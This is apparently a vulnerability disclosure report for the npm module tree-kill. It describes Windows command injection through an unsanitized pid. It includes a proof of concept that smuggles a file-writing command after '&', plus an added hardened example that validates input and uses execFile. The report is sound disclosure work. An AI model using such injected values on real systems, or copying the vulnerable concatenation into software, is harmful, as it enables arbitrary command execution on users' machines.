
Node.js third-party modules: [tree-kill] RCE via insecure command concatenation (only Windows)


I would like to report an RCE issue in the tree-kill module. It allows executing arbitrary commands remotely inside the victim's PC.

Module

module name: tree-kill
version: 1.2.1
npm page: https://www.npmjs.com/package/tree-kill

Module Description

Kill all processes in the process tree, including the root process.

Module Stats

[N/A] downloads in the last day
[2,108,440] downloads in the last week
[~10M] downloads in the last month

Vulnerability Description

The issue occurs because user input is concatenated with a command that will be executed without any check. The issue arises here: https://github.com/pkrumins/node-tree-kill/blob/master/index.js#L20 (as you can see, the Linux part is sanitized, while the Win one is not ... it simply uses the + operand to concatenate the input)

Steps To Reproduce:

Create the following PoC file:

```js
// poc.js
var kill = require('tree-kill');
kill('3333332 & echo "HACKED" > HACKED.txt & ');
```

1. Execute the following commands in another terminal:

```bash
npm i tree-kill # Install affected module
dir # Check *HACKED.txt* doesn't exist
node poc.js # Run the PoC
dir # Now *HACKED.txt* exists :)
```

2. A new file called HACKED.txt will be created, containing the HACKED string

Note

I can't provide a screenshot as I'm working on Linux (I'll be able to reinstall win only the next week), but the code shown in the module (line 20) makes clear the attack is possible. Please note I'm not sure of the batch syntax used; as said, I can't verify it on a win machine.......

https://vulners.com/hackerone/H1:701183?utm_source=rss&utm_medium=rss&utm_campaign=rss
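The concatenation pattern the report describes, next to a hardened form, as an added example that is not part of the original report and not tree-kill's own code. The function names are hypothetical, and the `taskkill /pid <pid> /T /F` command shape is an assumption about what the Windows branch builds.

```javascript
// Added example: pid handling for a Windows process-tree kill helper.
// Function names are hypothetical; this is not tree-kill's source code.

// Vulnerable pattern from the report: the caller's value is pasted into a
// string that a shell (cmd.exe) will parse, so "&" starts a new command.
// The taskkill command shape is an assumption (see lead-in).
function unsafeCommand(pid) {
  return 'taskkill /pid ' + pid + ' /T /F';
}

// Strict validation: accept only a non-negative safe integer, given either
// as a number or as a short string of ASCII digits. parseInt() alone is too
// lenient: parseInt('12 & x') === 12, silently accepting trailing text.
function parsePid(value) {
  if (typeof value === 'number') {
    if (Number.isSafeInteger(value) && value >= 0) return value;
  } else if (typeof value === 'string' && /^[0-9]{1,10}$/.test(value)) {
    return Number(value);
  }
  throw new TypeError('pid must be a non-negative integer');
}

// Hardened form: validated pid, argument vector, no shell involved.
function taskkillArgs(pid) {
  return ['/pid', String(parsePid(pid)), '/T', '/F'];
}

function killTreeWindows(pid, callback) {
  let args;
  try {
    args = taskkillArgs(pid);
  } catch (err) {
    return callback(err); // reject before any process is started
  }
  // execFile runs the binary directly; args are never parsed by a shell.
  // Required lazily so the validator can be loaded without child_process.
  const { execFile } = require('child_process');
  execFile('taskkill', args, callback);
}

// Constructed input, reusing the string from the report's PoC.
const hostile = '3333332 & echo "HACKED" > HACKED.txt & ';
function demo() {
  let rejected = false;
  try { taskkillArgs(hostile); } catch (e) { rejected = e instanceof TypeError; }
  return { unsafe: unsafeCommand(hostile), rejected, ok: taskkillArgs('4321') };
}
```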
